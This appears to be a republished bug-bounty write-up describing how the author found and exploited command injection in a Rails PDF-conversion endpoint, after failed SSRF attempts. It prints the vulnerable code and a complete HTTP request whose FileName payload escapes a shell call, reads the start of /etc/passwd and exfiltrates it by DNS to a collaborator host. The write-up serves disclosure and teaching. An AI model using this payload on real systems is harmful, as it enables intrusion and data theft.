Mix

Basic recon to RCE III

7 min read
Share X / Twitter LinkedIn Reddit WhatsApp


For the 3rd and I think last episode of the series, we’re going to continue with the same target as the episode 2, that I recommend you to go and see at first to put you a bit more in the context : Basic recon to RCE II

The Story

So, after this first RCE discovered on the application, I wanted to continue to dig, especially because this debug mode displays a POST method on the endpoint /convertdoctopdf. So I immediately thought about a SSRF and as it’s a bug that I like quite a lot, I wanted to dig it.

Another advantage of the debug mode (on Rails and maybe with other frameworks) is that if the application raises an exception, it will show you the part of the source code concerned in the response, which is pretty handy when you don’t know which parameter you should use !

After a first POST request without body, the application displays an error 500 with the piece of code that concerns the error, which tells us that the SessionId parameter is missing. I spare you the details but this technique allowed me to obtain the complete code of the method :

def convertdoctopdf
  header = {'Content-Type' =>'application/json','Authorization' => 'OAuth '+params['SessionId']}
  id = params['AttachmentId']
  baseURL = params['Url']
  fileName = params['FileName'] ? params['FileName']+(Time.now.to_i).to_s : 'fileconvert'+(Time.now.to_i).to_s
  uri = URI.parse(baseURL+"/services/data/v44.0/sobjects/Attachment/"+id+"/Body")
  
  https = Net::HTTP.new(uri.host,uri.port)
  https.use_ssl = true
  req = Net::HTTP::Get.new(uri.path, header)
  attachment = https.request(req)

  File.open("#{Rails.root}/public/#{fileName+'.docx'}", 'wb') { |f| f.write(attachment.body) }
  %x(/usr/bin/soffice --headless --convert-to pdf --outdir  "#{Rails.root}/public/file_conversion/" "#{Rails.root}/public/#{fileName+'.docx'}")

  outputfileBase64 = Base64.encode64(open("#{Rails.root}/public/file_conversion/#{fileName}.pdf").to_a.join);
 
  File.delete("#{Rails.root}/public/file_conversion/#{fileName+'.pdf'}") if File.exist?("#{Rails.root}/public/file_conversion/#{fileName+'.pdf'}")
  File.delete("#{Rails.root}/public/#{fileName+'.docx'}") if File.exist?("#{Rails.root}/public/#{fileName+'.docx'}")
 
  render json: {file: outputfileBase64}, status: :created, location: "Done"
end

Which can be described as follows:

  • header = Expects the SessionID parameter but is not important here, you can put anything
  • id = Waits for the AttachmentId parameter but is not important either, you can put anything too
  • baseUrl = Waits for the url parameter, just enter a valid URL
  • fileName = There is a ternary condition that makes it an optional parameter
  • Then a GET request is made, the content is saved to a file, converted to PDF and displayed to the user in base64

I had first stopped after leaking the HTTP request line thinking that was all I needed to trigger my SSRF. Except:

  • A GET request is made on the URL + path /services/data/v44.0/sobjects/Attachment/"+id+"/Body" but that can be easily bypassed by specifying a URL of type https://domain.tld/?x=, the path will then be forced as the parameter value.
    • The URL will become: https://domain.tld/?x=/services/data/v44.0/sobjects/Attachment/"+id+"/Body"
  • https.use_ssl = true which is the blocking point because it forces the use of HTTPS

Going back to our source code, I was saying that the body of the response is saved in a file (with the extension docx but in fact it doesn’t matter, it’s not a real docx but rather a simple text file) and then the soffice binary is called and converts this file into a PDF and displays the content of the PDF in base64 in the response. Something I didn’t know yet because I was too focused on the SSRF and I could see in the return of my request in the answer and I didn’t try to understand the cause.

I spent a few hours on the SSRF without being able to exploit it because :

  • The use of HTTPS prevents me from typing on internal URLs such as http://127.0.0.1
  • The target must have a valid certificate
  • For some reason I couldn’t query a target using a let’s encrypt certificate…

Anyway, after these blocking points, to try to inject some code in my PDF I used a Github repository on which I uploaded my PoC then I used the RAW URL (like https://raw.githubusercontent.com/user/poc/master/poc.html) to inject the content in the PDF. Unfortunately after many tries, the only tag that seemed to be interpreted was the </code> tag, the others were either deleted or not interpreted.</p><p>A little disappointed at the time, I gave up because I had other things to do.<br /> That same day I spent the evening with my hunter friend Serizao, and I obviously told him my SSRF problem, we continued to dig together and to have a better overview, we recovered the complete code of the method above.</p><p>At this moment, a line directly appealed to us.</p><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-ruby" data-lang="ruby"><span style="display:flex;"><span><span style="color:#e6db74">%x(/usr/bin/soffice --headless --convert-to pdf --outdir "</span><span style="color:#e6db74">#{</span><span style="color:#66d9ef">Rails</span><span style="color:#f92672">.</span>root<span style="color:#e6db74">}</span><span style="color:#e6db74">/public/file_conversion/" "</span><span style="color:#e6db74">#{</span><span style="color:#66d9ef">Rails</span><span style="color:#f92672">.</span>root<span style="color:#e6db74">}</span><span style="color:#e6db74">/public/</span><span style="color:#e6db74">#{</span>fileName<span style="color:#f92672">+</span><span style="color:#e6db74">'.docx'</span><span style="color:#e6db74">}</span><span style="color:#e6db74">")</span> </span></span></code></pre></div><p>The use of <code>%x()</code> is an alternative to the use of backticks which allows you to make a system call and display the output. Like backticks, <code>%x()</code> also allows string interpolation.</p><p>I explained above, that the FileName parameter is optional :</p><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-ruby" data-lang="ruby"><span style="display:flex;"><span>fileName <span style="color:#f92672">=</span> params<span style="color:#f92672">[</span><span style="color:#e6db74">'FileName'</span><span style="color:#f92672">]</span> ? params<span style="color:#f92672">[</span><span style="color:#e6db74">'FileName'</span><span style="color:#f92672">]+</span>(<span style="color:#66d9ef">Time</span><span style="color:#f92672">.</span>now<span style="color:#f92672">.</span>to_i)<span style="color:#f92672">.</span>to_s : <span style="color:#e6db74">'fileconvert'</span><span style="color:#f92672">+</span>(<span style="color:#66d9ef">Time</span><span style="color:#f92672">.</span>now<span style="color:#f92672">.</span>to_i)<span style="color:#f92672">.</span>to_s </span></span></code></pre></div><p>Because if it is not present, it is set with a default value automatically, but if it is present, it is equivalent to the user input (and this is where the vulnerability lies). The problem is that the string interpolation allows to inject an arbitrary command to execute an additional command to the soffice binary call.</p><p>Example to illustrate my point, inside <code>irb</code> :</p><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-ruby" data-lang="ruby"><span style="display:flex;"><span><span style="color:#ae81ff">2</span><span style="color:#f92672">.</span><span style="color:#ae81ff">7</span><span style="color:#f92672">.</span><span style="color:#ae81ff">1</span> :<span style="color:#ae81ff">001</span> <span style="color:#f92672">></span> filename <span style="color:#f92672">=</span> <span style="color:#e6db74">'`id`'</span><span style="color:#f92672">+</span><span style="color:#66d9ef">Time</span><span style="color:#f92672">.</span>now<span style="color:#f92672">.</span>to_i<span style="color:#f92672">.</span>to_s </span></span><span style="display:flex;"><span><span style="color:#ae81ff">2</span><span style="color:#f92672">.</span><span style="color:#ae81ff">7</span><span style="color:#f92672">.</span><span style="color:#ae81ff">1</span> :<span style="color:#ae81ff">002</span> <span style="color:#f92672">></span> <span style="color:#e6db74">%x("</span><span style="color:#e6db74">#{</span>filename<span style="color:#e6db74">}</span><span style="color:#e6db74">")</span> </span></span><span style="display:flex;"><span><span style="color:#e6db74">sh</span>: uid<span style="color:#f92672">=</span><span style="color:#ae81ff">635388061</span>(jomar) <span style="color:#f92672">[...]</span><span style="color:#ae81ff">1646581930</span>: command <span style="color:#f92672">not</span> found </span></span><span style="display:flex;"><span> <span style="color:#f92672">=></span> <span style="color:#e6db74">""</span> </span></span><span style="display:flex;"><span><span style="color:#ae81ff">2</span><span style="color:#f92672">.</span><span style="color:#ae81ff">7</span><span style="color:#f92672">.</span><span style="color:#ae81ff">1</span> :<span style="color:#ae81ff">003</span> <span style="color:#f92672">></span> </span></span></code></pre></div><p>So we can see that the id command is executed.<br /> With the following request, it is possible to escape the call to soffice and execute an arbitrary command, to show the vulnerability, I extracted the first characters of the <code>/etc/passwd</code> file :</p><pre tabindex="0"><code>POST /convertdoctopdf HTTP/1.1 Host: sub.target.tld User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Length: 214 Content-Type: application/json;charset=UTF-8 { "SessionId":"1", "AttachmentId":"1", "FileName": "" && getent hosts $(`echo aGVhZCAtYyA0IC9ldGMvcGFzc3dkCg== | base64 -d`).9blrzz2yqaikw8t47xdlfgsa91fr3g.private.collaborator.tld #"", "Url":"https://www.google.com" } </code></pre><p><em>Side note</em> : a domain name can be 255 characters long but a subdomain is limited to 63 characters, think about it if you do a DNS extraction</p><p>Explanation of</p><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#e6db74">"" && getent hosts </span><span style="color:#66d9ef">$(</span><span style="color:#e6db74">`</span>echo aGVhZCAtYyA0IC9ldGMvcGFzc3dkCg<span style="color:#f92672">==</span> | base64 -d<span style="color:#e6db74">`</span><span style="color:#66d9ef">)</span><span style="color:#e6db74">.9blrzz2yqaikw8t47xdlfgsa91fr3g.private.collaborator.tld #" </span></span></span></code></pre></div><ul><li><code>"</code> : Allows to close the parameter pass to soffice binary for the file name</li><li><code>&&</code> : Indicates that a second command is being processed</li><li><code>getent hosts</code> : Not having <code>curl</code>, <code>dig</code>, <code>ping</code> etc… available in the environment I used <code>getent hosts</code> to execute a DNS query</li><li><code>$(echo aGVhZCAtYyA0IC9ldGMvcGFzc3dkCg== | base64 -d)</code> : To avoid encoding problems because of the <code>/</code> which raises an error with the File.open so, we put our command in base64<ul><li><code>echo aGVhZCAtYyA0IC9ldGMvcGFzc3dkCg== | base64 -d => head -c 4 /etc/passwd</code>. The first 4 characters of the <code>/etc/passwd</code> file which correspond to root<ul><li><code>9blrzz2yqaikw8t47xdlfgsa91fr3g.private.collaborator.tld</code> : My private burp collaborator server</li><li><code>#"</code> : Allows you to comment out the end of the line and the <code>"</code> to avoid a syntax error in the command</li></ul></li></ul></li></ul><p>In the end, the executed command will be :</p><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>/usr/bin/soffice --headless --convert-to pdf --outdir <span style="color:#e6db74">"folder/public/file_conversion/"</span> <span style="color:#e6db74">"folder/public/"</span> <span style="color:#f92672">&&</span> getent hosts <span style="color:#66d9ef">$(</span><span style="color:#e6db74">`</span>echo aGVhZCAtYyA0IC9ldGMvcGFzc3dkCg<span style="color:#f92672">==</span> | base64 -d<span style="color:#e6db74">`</span><span style="color:#66d9ef">)</span>.9blrzz2yqaikw8t47xdlfgsa91fr3g.private.collaborator.tld <span style="color:#75715e">#".pdf").to_a.join);</span> </span></span></code></pre></div><h2 id="conclusion">Conclusion</h2><p>A bug that I found super interesting and was also present for a long time. I know because I had already identified this method more than 6 months ago but I had not taken the time to dig.</p><p>What made the difference today is something that is very well explained here: <a rel="nofollow noopener" target="_blank" href="https://twitter.com/hacker_/status/1509147518638116866">Corben Leo – Hacking CAN be easy</a>. I’ve been developing small web / api applications on my own time for several months now and I use Ruby on Rails, in addition to giving me a good knowledge of the framework, it also gives me a better vision of a developer and sometimes I do sh*t because I want to go fast or because it annoys me and if I make these mistakes, why shouldn’t others do it too ?</p><p>But also probably because rather than going from domain to domain looking for the ugly stuff that looks vulnerable, I thought I really wanted to exploit this thing and so I spent some time on it. Which shows once again that sometimes it’s much more interesting to focus on an application and understand it than to try to find a magic domain and spread payloads around without understanding what you’re doing</p></p></div><p><script type="litespeed/javascript" data-src="//platform.twitter.com/widgets.js" charset="utf-8"></script><br /> <br /><a href="https://bunny.net?ref=4buc1qv1m5" border="0"><img data-lazyloaded="1" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI5MzYiIGhlaWdodD0iMTIwIiB2aWV3Qm94PSIwIDAgOTM2IDEyMCI+PHJlY3Qgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgc3R5bGU9ImZpbGw6I2NmZDRkYjtmaWxsLW9wYWNpdHk6IDAuMTsiLz48L3N2Zz4=" decoding="async" data-src="https://image.cybernoz.com/aff/bunny.png" width="936" height="120" /></a><br /> <br /><a href="https://www.jomar.fr/posts/2022/basic_recon_to_rce_iii/">Source link </a></p></div><div class="cn-share" aria-label="Share this article"> <span class="cn-share__label">Share</span><a class="cn-share__btn cn-share__btn--x" href="https://twitter.com/intent/tweet?url=https%3A%2F%2Fcybernoz.com%2Fbasic-recon-to-rce-iii%2F&text=Basic+recon+to+RCE+III" target="_blank" rel="noopener noreferrer" aria-label="Share on X/Twitter"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16"><path d="M12.6.75h2.454l-5.36 6.142L16 15.25h-4.937l-3.867-5.07-4.425 5.07H.316l5.733-6.57L0 .75h5.063l3.495 4.633L12.601.75Zm-.86 13.028h1.36L4.323 2.145H2.865l8.875 11.633Z"/></svg> <span>X / Twitter</span> </a><a class="cn-share__btn cn-share__btn--linkedin" href="https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Fcybernoz.com%2Fbasic-recon-to-rce-iii%2F" target="_blank" rel="noopener noreferrer" aria-label="Share on LinkedIn"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16"><path d="M0 1.146C0 .513.526 0 1.175 0h13.65C15.474 0 16 .513 16 1.146v13.708c0 .633-.526 1.146-1.175 1.146H1.175C.526 16 0 15.487 0 14.854V1.146zm4.943 12.248V6.169H2.542v7.225h2.401zm-1.2-8.212c.837 0 1.358-.554 1.358-1.248-.015-.709-.52-1.248-1.342-1.248-.822 0-1.359.54-1.359 1.248 0 .694.521 1.248 1.327 1.248h.016zm4.908 8.212V9.359c0-.216.016-.432.08-.586.173-.431.568-.878 1.232-.878.869 0 1.216.662 1.216 1.634v3.865h2.401V9.25c0-2.22-1.184-3.252-2.764-3.252-1.274 0-1.845.7-2.165 1.193v.025h-.016a5.54 5.54 0 0 1 .016-.025V6.169h-2.4c.03.678 0 7.225 0 7.225h2.4z"/></svg> <span>LinkedIn</span> </a><a class="cn-share__btn cn-share__btn--reddit" href="https://www.reddit.com/submit?url=https%3A%2F%2Fcybernoz.com%2Fbasic-recon-to-rce-iii%2F&title=Basic+recon+to+RCE+III" target="_blank" rel="noopener noreferrer" aria-label="Share on Reddit"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16"><path d="M6.167 8a.831.831 0 0 0-.83.83c0 .459.372.84.83.831a.831.831 0 0 0 0-1.661zm1.843 3.647c.315 0 1.403-.038 1.976-.611a.232.232 0 0 0 0-.306.213.213 0 0 0-.306 0c-.353.363-1.126.487-1.67.487-.545 0-1.308-.124-1.671-.487a.213.213 0 0 0-.306 0 .213.213 0 0 0 0 .306c.564.563 1.652.61 1.977.61zm.992-2.807c0 .458.373.83.831.83.458 0 .83-.381.83-.83a.831.831 0 0 0-1.66 0z"/><path d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0zm-3.828-1.165c-.315 0-.602.124-.812.325-1.781-.458-2.916-.458-2.916-.458l.612-2.169 1.525.372a.678.678 0 1 0 .07-.306l-1.68-.411a.198.198 0 0 0-.229.124l-.687 2.417s-1.148 0-2.954.458a1.16 1.16 0 0 0-.812-.325 1.165 1.165 0 0 0-.487 2.222 2.627 2.627 0 0 0-.03.391c0 1.97 2.293 3.572 5.122 3.572 2.828 0 5.122-1.603 5.122-3.572 0-.134-.01-.268-.039-.4a1.158 1.158 0 0 0-.487-2.222h-.018z"/></svg> <span>Reddit</span> </a><a class="cn-share__btn cn-share__btn--whatsapp" href="https://wa.me/?text=Basic+recon+to+RCE+III%20https%3A%2F%2Fcybernoz.com%2Fbasic-recon-to-rce-iii%2F" target="_blank" rel="noopener noreferrer" aria-label="Share on WhatsApp"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16"><path d="M13.601 2.326A7.854 7.854 0 0 0 7.994 0C3.627 0 .068 3.558.064 7.926c0 1.399.366 2.76 1.057 3.965L0 16l4.204-1.102a7.933 7.933 0 0 0 3.79.965h.004c4.368 0 7.926-3.558 7.93-7.93A7.898 7.898 0 0 0 13.6 2.326zM7.994 14.521a6.573 6.573 0 0 1-3.356-.92l-.24-.144-2.494.654.666-2.433-.156-.251a6.56 6.56 0 0 1-1.007-3.505c0-3.626 2.957-6.584 6.591-6.584a6.56 6.56 0 0 1 4.66 1.931 6.557 6.557 0 0 1 1.928 4.66c-.004 3.639-2.961 6.592-6.592 6.592zm3.615-4.934c-.197-.099-1.17-.578-1.353-.646-.182-.065-.315-.099-.445.099-.133.197-.513.646-.627.775-.114.133-.232.148-.43.05-.197-.1-.836-.308-1.592-.985-.59-.525-.985-1.175-1.103-1.372-.114-.198-.011-.304.088-.403.087-.088.197-.232.296-.346.1-.114.133-.198.198-.33.065-.134.034-.248-.015-.347-.05-.099-.445-1.076-.612-1.47-.16-.389-.323-.335-.445-.34-.114-.007-.247-.007-.38-.007a.729.729 0 0 0-.529.247c-.182.198-.691.677-.691 1.654 0 .977.71 1.916.81 2.049.098.133 1.394 2.132 3.383 2.992.47.205.84.326 1.129.418.475.152.904.129 1.246.08.38-.058 1.171-.48 1.338-.943.164-.464.164-.86.114-.943-.049-.084-.182-.133-.38-.232z"/></svg> <span>WhatsApp</span> </a><a class="cn-share__btn cn-share__btn--email" href="mailto:?subject=Basic+recon+to+RCE+III&body=https%3A%2F%2Fcybernoz.com%2Fbasic-recon-to-rce-iii%2F" aria-label="Share via Email"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16"><path d="M0 4a2 2 0 0 1 2-2h12a2 2 0 0 1 2 2v8a2 2 0 0 1-2 2H2a2 2 0 0 1-2-2V4Zm2-1a1 1 0 0 0-1 1v.217l7 4.2 7-4.2V4a1 1 0 0 0-1-1H2Zm13 2.383-4.708 2.825L15 11.105V5.383Zm-.034 6.876-5.64-3.471L8 9.583l-1.326-.795-5.64 3.47A1 1 0 0 0 2 13h12a1 1 0 0 0 .966-.741ZM1 11.105l4.708-2.897L1 5.383v5.722Z"/></svg> <span>Email</span> </a><button class="cn-share__btn cn-share__btn--copy" onclick="navigator.clipboard.writeText('https://cybernoz.com/basic-recon-to-rce-iii/').then(()=>{this.querySelector('span').textContent='Copied!';setTimeout(()=>{this.querySelector('span').textContent='Copy Link'},2000)})" aria-label="Copy link"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16"><path d="M4.715 6.542 3.343 7.914a3 3 0 1 0 4.243 4.243l1.828-1.829A3 3 0 0 0 8.586 5.5L8 6.086a1.002 1.002 0 0 0-.154.199 2 2 0 0 1 .861 3.337L6.88 11.45a2 2 0 1 1-2.83-2.83l.793-.792a4.018 4.018 0 0 1-.128-1.287z"/><path d="M6.586 4.672A3 3 0 0 0 7.414 9.5l.775-.776a2 2 0 0 1-.896-3.346L9.12 3.55a2 2 0 1 1 2.83 2.83l-.793.792c.112.42.155.855.128 1.287l1.372-1.372a3 3 0 1 0-4.243-4.243L6.586 4.672z"/></svg> <span>Copy Link</span> </button></div><nav class="cn-post-nav" aria-label="Post navigation" style="display:flex;justify-content:space-between;gap:1rem;margin-top:2rem;padding-top:1.5rem;border-top:1px solid var(--cn-border);"><div style="flex:1;"> <span style="font-size:0.8rem;color:var(--cn-text-muted);">« Previous</span><br><a href="https://cybernoz.com/how-a-catholic-group-doxed-gay-priests/" rel="prev">How a Catholic Group Doxed Gay Priests</a></div><div style="flex:1;text-align:right;"> <span style="font-size:0.8rem;color:var(--cn-text-muted);">Next »</span><br><a href="https://cybernoz.com/batloader-malware-uses-google-ads-to-deliver-vidar-stealer-and-ursnif-payloads/" rel="next">BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads</a></div></nav></article><section class="cn-related" aria-label="Related articles"><div class="cn-section-header"><h2>Related Articles</h2> <a href="https://cybernoz.com/category/mix/" class="cn-section-header__link"> All Mix → </a></div><div class="cn-posts-grid"><article class="cn-card post-30466 post type-post status-publish format-standard has-post-thumbnail hentry category-mix" itemscope itemtype="https://schema.org/NewsArticle"><div class="cn-card__image"> <a href="https://cybernoz.com/more-than-bounty-beating-burnout-with-hacker-powered-security/" aria-hidden="true" tabindex="-1"> <img data-no-lazy="1" width="360" height="270" src="https://image.cybernoz.com/wp-content/uploads/2023/05/More-Than-Bounty-Beating-Burnout-with-Hacker-Powered-Security.jpg" class="attachment-cybernoz-card size-cybernoz-card wp-post-image" alt="More Than Bounty Beating Burnout with Hacker Powered Security" itemprop="image" decoding="async" fetchpriority="high" /> </a> <a class="cn-card__category" href="https://cybernoz.com/category/mix/">Mix</a></div><div class="cn-card__body"><h3 class="cn-card__title" itemprop="headline"> <a href="https://cybernoz.com/more-than-bounty-beating-burnout-with-hacker-powered-security/" itemprop="url">More Than Bounty: Beating Burnout with Hacker-Powered Security</a></h3><p class="cn-card__excerpt" itemprop="description">A career in security is hardly dull or static. Nor would those attracted to the industry want it to be. On the contrary — we…</p><div class="cn-card__meta"> <time datetime="2023-05-11T22:51:17+03:00"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M4 .5a.5.5 0 0 0-1 0V1H2a2 2 0 0 0-2 2v1h16V3a2 2 0 0 0-2-2h-1V.5a.5.5 0 0 0-1 0V1H4V.5zM16 14V5H0v9a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2z"/></svg> May 11, 2023 </time> <span class="cn-card__author"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M8 8a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm2-3a2 2 0 1 1-4 0 2 2 0 0 1 4 0zm4 8c0 1-1 1-1 1H3s-1 0-1-1 1-4 6-4 6 3 6 4zm-1-.004c-.001-.246-.154-.986-.832-1.664C11.516 10.68 10.289 10 8 10c-2.29 0-3.516.68-4.168 1.332-.678.678-.83 1.418-.832 1.664h10z"/></svg> <a href="https://cybernoz.com/author/cybernoz/" rel="author">Cybernoz</a> </span> <span class="cn-card__reading-time"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M8 3.5a.5.5 0 0 0-1 0V8a.5.5 0 0 0 .252.434l3.5 2a.5.5 0 0 0 .496-.868L8 7.71V3.5z"/><path d="M8 16A8 8 0 1 0 8 0a8 8 0 0 0 0 16zm7-8A7 7 0 1 1 1 8a7 7 0 0 1 14 0z"/></svg> 4 min read </span></div><meta itemprop="datePublished" content="2023-05-11T22:51:17+03:00"><meta itemprop="author" content="Cybernoz"></div></article><article class="cn-card post-29699 post type-post status-publish format-standard has-post-thumbnail hentry category-mix" itemscope itemtype="https://schema.org/NewsArticle"><div class="cn-card__image"> <a href="https://cybernoz.com/my-career-just-got-hacked-rana-robillard-joins-hackerone/" aria-hidden="true" tabindex="-1"> <img width="360" height="270" src="https://image.cybernoz.com/wp-content/uploads/2023/05/My-Career-Just-Got-Hacked-Rana-Robillard-Joins-HackerOne.png" class="attachment-cybernoz-card size-cybernoz-card wp-post-image" alt="My Career Just Got Hacked Rana Robillard Joins HackerOne" itemprop="image" decoding="async" /> </a> <a class="cn-card__category" href="https://cybernoz.com/category/mix/">Mix</a></div><div class="cn-card__body"><h3 class="cn-card__title" itemprop="headline"> <a href="https://cybernoz.com/my-career-just-got-hacked-rana-robillard-joins-hackerone/" itemprop="url">My Career Just Got Hacked: Rana Robillard Joins HackerOne</a></h3><p class="cn-card__excerpt" itemprop="description">My career just got hacked.. and I couldn’t be more excited about it. Turns out, getting your career hacked* can be exactly what you need…</p><div class="cn-card__meta"> <time datetime="2023-05-08T16:23:32+03:00"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M4 .5a.5.5 0 0 0-1 0V1H2a2 2 0 0 0-2 2v1h16V3a2 2 0 0 0-2-2h-1V.5a.5.5 0 0 0-1 0V1H4V.5zM16 14V5H0v9a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2z"/></svg> May 8, 2023 </time> <span class="cn-card__author"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M8 8a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm2-3a2 2 0 1 1-4 0 2 2 0 0 1 4 0zm4 8c0 1-1 1-1 1H3s-1 0-1-1 1-4 6-4 6 3 6 4zm-1-.004c-.001-.246-.154-.986-.832-1.664C11.516 10.68 10.289 10 8 10c-2.29 0-3.516.68-4.168 1.332-.678.678-.83 1.418-.832 1.664h10z"/></svg> <a href="https://cybernoz.com/author/cybernoz/" rel="author">Cybernoz</a> </span> <span class="cn-card__reading-time"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M8 3.5a.5.5 0 0 0-1 0V8a.5.5 0 0 0 .252.434l3.5 2a.5.5 0 0 0 .496-.868L8 7.71V3.5z"/><path d="M8 16A8 8 0 1 0 8 0a8 8 0 0 0 0 16zm7-8A7 7 0 1 1 1 8a7 7 0 0 1 14 0z"/></svg> 3 min read </span></div><meta itemprop="datePublished" content="2023-05-08T16:23:32+03:00"><meta itemprop="author" content="Cybernoz"></div></article><article class="cn-card post-27867 post type-post status-publish format-standard has-post-thumbnail hentry category-mix" itemscope itemtype="https://schema.org/NewsArticle"><div class="cn-card__image"> <a href="https://cybernoz.com/common-security-misconfigurations-and-remediations/" aria-hidden="true" tabindex="-1"> <img width="360" height="270" src="https://image.cybernoz.com/wp-content/uploads/2023/04/Common-security-misconfigurations-and-remediations.png" class="attachment-cybernoz-card size-cybernoz-card wp-post-image" alt="Common security misconfigurations and remediations" itemprop="image" decoding="async" /> </a> <a class="cn-card__category" href="https://cybernoz.com/category/mix/">Mix</a></div><div class="cn-card__body"><h3 class="cn-card__title" itemprop="headline"> <a href="https://cybernoz.com/common-security-misconfigurations-and-remediations/" itemprop="url">Common security misconfigurations and remediations</a></h3><p class="cn-card__excerpt" itemprop="description">A misconfiguration is exactly what it sounds like; something that is wrongly configured. From a security perspective this can be either fairly harmless, or in…</p><div class="cn-card__meta"> <time datetime="2023-04-28T05:44:33+03:00"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M4 .5a.5.5 0 0 0-1 0V1H2a2 2 0 0 0-2 2v1h16V3a2 2 0 0 0-2-2h-1V.5a.5.5 0 0 0-1 0V1H4V.5zM16 14V5H0v9a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2z"/></svg> April 28, 2023 </time> <span class="cn-card__author"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M8 8a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm2-3a2 2 0 1 1-4 0 2 2 0 0 1 4 0zm4 8c0 1-1 1-1 1H3s-1 0-1-1 1-4 6-4 6 3 6 4zm-1-.004c-.001-.246-.154-.986-.832-1.664C11.516 10.68 10.289 10 8 10c-2.29 0-3.516.68-4.168 1.332-.678.678-.83 1.418-.832 1.664h10z"/></svg> <a href="https://cybernoz.com/author/cybernoz/" rel="author">Cybernoz</a> </span> <span class="cn-card__reading-time"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M8 3.5a.5.5 0 0 0-1 0V8a.5.5 0 0 0 .252.434l3.5 2a.5.5 0 0 0 .496-.868L8 7.71V3.5z"/><path d="M8 16A8 8 0 1 0 8 0a8 8 0 0 0 0 16zm7-8A7 7 0 1 1 1 8a7 7 0 0 1 14 0z"/></svg> 3 min read </span></div><meta itemprop="datePublished" content="2023-04-28T05:44:33+03:00"><meta itemprop="author" content="Cybernoz"></div></article><article class="cn-card post-53666 post type-post status-publish format-standard has-post-thumbnail hentry category-mix" itemscope itemtype="https://schema.org/NewsArticle"><div class="cn-card__image"> <a href="https://cybernoz.com/intigriti-partners-with-tcm-security-to-train-the-next-generation-of-bug-bounty-hunters/" aria-hidden="true" tabindex="-1"> <img width="360" height="270" src="https://image.cybernoz.com/wp-content/uploads/2023/10/Intigriti-partners-with-TCM-Security-to-train-the-next-generation.png" class="attachment-cybernoz-card size-cybernoz-card wp-post-image" alt="Intigriti partners with TCM Security to train the next generation" itemprop="image" decoding="async" loading="lazy" /> </a> <a class="cn-card__category" href="https://cybernoz.com/category/mix/">Mix</a></div><div class="cn-card__body"><h3 class="cn-card__title" itemprop="headline"> <a href="https://cybernoz.com/intigriti-partners-with-tcm-security-to-train-the-next-generation-of-bug-bounty-hunters/" itemprop="url">Intigriti partners with TCM Security to train the next generation of bug bounty hunters</a></h3><p class="cn-card__excerpt" itemprop="description">ANTWERP – TCM Security, a cybersecurity services and education company, is joining forces with bug bounty experts from Intigriti to introduce an online course exclusively…</p><div class="cn-card__meta"> <time datetime="2023-10-03T07:58:39+03:00"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M4 .5a.5.5 0 0 0-1 0V1H2a2 2 0 0 0-2 2v1h16V3a2 2 0 0 0-2-2h-1V.5a.5.5 0 0 0-1 0V1H4V.5zM16 14V5H0v9a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2z"/></svg> October 3, 2023 </time> <span class="cn-card__author"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M8 8a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm2-3a2 2 0 1 1-4 0 2 2 0 0 1 4 0zm4 8c0 1-1 1-1 1H3s-1 0-1-1 1-4 6-4 6 3 6 